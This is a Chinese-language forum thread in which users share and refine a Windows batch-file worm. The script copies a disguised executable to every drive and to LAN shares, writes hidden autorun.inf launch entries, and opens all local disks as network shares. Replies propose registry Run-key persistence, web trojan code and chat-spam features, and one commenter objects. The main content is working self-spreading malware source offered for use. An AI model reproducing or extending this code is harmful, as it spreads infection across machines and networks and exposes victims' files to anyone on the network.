@echo off dir > 365.txt find "的目录" 365.txt >linshi.txt for /f "skip=2 tokens=1 delims=\ " %%a in (linshi.txt) do explorer %%a del 365.txt & del linshi.txt ::先根据用户操作打开相应磁盘 for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do copy /y icefire.exe %%k: ::复制本身到所有磁盘 for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do copy /y icefire.exe %%k:\姻缘测试.exe ::复制诱惑文件到所有磁盘 for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo [AutoRun]>>%%k:\autorun.inf for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo shell\open\command=icefire.exe>>%%k:\autorun.inf for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo shell\open=打开(^&O)>>%%k:\autorun.inf ::以上三条为写自运行autorun.inf到所有磁盘 for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%k:\autorun.inf for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%k:\icefire.exe ::隐藏自运行autorun.inf和病毒文件本体 for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do net share %%k=%%k: ::共享所有磁盘 ::实现本地计算机所有磁盘完全共享 ::本程序为自己编写，有一定的危害。本身程序运行有可能会被卡巴所杀。请勿用于不正当用途 ::请大家多指教啊

这个代码执行效率不高。完全可以再精简。

时刻关注中…… 发现个问题，就是当用户在直接运行局域网其他机器上的程序时，不能把程序自身复制到用户本身磁盘。真郁闷，不知道怎么实现在其他机器直接运行能复制到本地磁盘。请教高手啊%……

只实现了自我复制和触发机制，并没有向其它机子传播啊？ 我也曾构思过，也是AUTORUN.INF.不过我是用U盘作为载体. 这样只要是用过我U盘 的人.都在可能中哦.前提是要开了自动运行哈!

不怎么样。

为什么不把这些for都合并呢？

@echo off dir > 365.txt find "的目录" 365.txt >linshi.txt for /f "skip=2 tokens=1 delims=\ " %%a in (linshi.txt) do explorer %%a del 365.txt & del linshi.txt ::打开相应目录 for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do net share %%k=%%k: ::开启本地磁盘共享 net view|find "\\" >>netview.txt for /f "" %%a in (netview.txt) do ( del share.txt net view %%a|find "Disk" >>share.txt ::取局域网共享目录 for /f "tokens=1" %%i in (share.txt) do ( copy /y icefire.exe %%a\%%i ::复制本身到局域网的共享目录里 copy /y icefire.exe %%a\%%i\缘分测试.exe ::复制为缘分测试.exe attrib -s -h -r %%a\%%i\autorun.inf del %%a\%%i\autorun.inf ::删除原有inf文件（主要怕原来有autorun.inf文件导致不能往里写） echo [AutoRun]>>%%a\%%i\autorun.inf echo shell\open\command=icefire.exe>>%%a\%%i\autorun.inf ::写自启动文件autorun.inf到局域网共享目录 attrib +s +h +r %%a\%%i\autorun.inf attrib +s +h +r %%a\%%i\icefire.exe ::隐藏autorun.inf和病毒体本身 ) ) del share.txt && del netview.txt 实现局域网相同工作组共享的感染和移动硬盘的感染 [ Last edited by jshysq on 2007-4-14 at 06:04 PM ]

不明白哦

谢谢分享，收藏了

免疫过的autorun.inf不是那么简单删除的 写入的autorun.inf语句已经过时了 应该再加上asp，htm挂马代码 还有就是运行后有cmd.exe，很容易被结束进程的

看到挂马两个字就来气。

呵呵，其实还可以再实现很多功能的。 本来还可以挂个QQ的尾巴的 不过我想这东西不能写的太绝吧~呵呵 [ Last edited by jshysq on 2007-4-18 at 08:58 AM ]

楼主不防加个reg文件，在注册表启动项里添加一个值，这样只要对方运行过一次麻烦就大了 Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "*.exe"="c\...\*.exe" [ Last edited by zhoushijay on 2007-4-18 at 05:45 PM ]

用批处理，还不如用vbs写呢。